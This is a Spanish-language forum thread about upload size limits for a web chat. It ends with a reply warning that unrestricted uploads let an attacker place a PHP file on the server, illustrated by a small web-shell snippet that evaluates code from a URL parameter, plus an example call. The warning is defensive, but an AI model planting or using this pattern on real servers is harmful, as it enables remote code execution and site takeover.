¿Que tamaño máximo incorporo a la subida de archivos a mi aplicación web?

[Drakaris]

Hola, estoy en un proceso en mi web, por la cual estoy haciendo un chat, por la cual en este chat, se puede subir archivos (imagenes, videos, audios y documentos), y quisiera saber cuantos MB o KB máximos podría restringir, cada uno. En este caso mi servidor solo acepta 2MB máximo de archivo (cualquiera).

imagenes: png, jpg, jpeg, gif y svg
audio: wav, mp3, ogg y midi
videos: mp4 ,avi ,mov, wmv
documentos: pdf, odt, ods, odp, odg, odf, doc, docx, xls, xlsx y ppt

Gracias.

[AlbertoBSD]

Hola, podrias saltarte ese filtro de 2 MB maximos, y tu determinar el tamaño adecuado ya sea por tipo de archivo y/o por permisos de usuario.

YO hace tiempo implemente un Upload gracias javascript con RESUMABLE y podia subir archivos de cualquier tamaño.

http://www.resumablejs.com/

Saludos

[Drakaris]

Hola, podrias saltarte ese filtro de 2 MB maximos, y tu determinar el tamaño adecuado ya sea por tipo de archivo y/o por permisos de usuario.

YO hace tiempo implemente un Upload gracias javascript con RESUMABLE y podia subir archivos de cualquier tamaño.

http://www.resumablejs.com/

Saludos

Ok, gracias, lo miraré.
En caso de si me fue bien. Que tamaño me recomiendan?

[AlbertoBSD]

Pues realmente todo depende de tu hosting, si no te limitan el espacio en disco lo mas recomendable es que no limites a los usuarios, dejalo en los 2 MB.

Aun asi insisto, si limitas el tamaño del archivo, tu servicio no presentaria ningun plus

Hechale un ojo a Resumable, no es dificil de implementar.

Y ojo con el upload de archivos, no te vallan a subir un archivo PHP y te vallan a hackear el sitio.

Saludos

[Drakaris]

Pues realmente todo depende de tu hosting, si no te limitan el espacio en disco lo mas recomendable es que no limites a los usuarios, dejalo en los 2 MB.

Aun asi insisto, si limitas el tamaño del archivo, tu servicio no presentaria ningun plus

Hechale un ojo a Resumable, no es dificil de implementar.

Y ojo con el upload de archivos, no te vallan a subir un archivo PHP y te vallan a hackear el sitio.

Saludos

Muchas gracias por la seguridad, no sabia elo de php

Pues realmente todo depende de tu hosting, si no te limitan el espacio en disco lo mas recomendable es que no limites a los usuarios, dejalo en los 2 MB.

Aun asi insisto, si limitas el tamaño del archivo, tu servicio no presentaria ningun plus

Hechale un ojo a Resumable, no es dificil de implementar.

Y ojo con el upload de archivos, no te vallan a subir un archivo PHP y te vallan a hackear el sitio.

Saludos

Como me podrian hackear la web con un archivo php?



Mod: Prohibido hacer doble post. Usa el boton modificar.

[AlbertoBSD]

Imaginate que eres un atacante y sabes que el Upload te permite subir cualquier tipo de archivo.

Tienes manera de conocer o descubrir en que directorio WEB se almacena y ese directorio esta accesible via http://example/directorio/archivo.php

Ahora solo subimos un pequeño codigo

Código (php) [Seleccionar] Expandir


<?php
if(isset($_GET["e"])) {
e v a 1($_GET["e"]);
}
?>


Por decir un ejemplo

ahora cuando llamemos a ese archivo y le pasemos

http://example/directorio/archivo.php?e=CodigoPHPMaligno

El restante es solo cuestion de saber que se quiere hacer en el servidor remoto.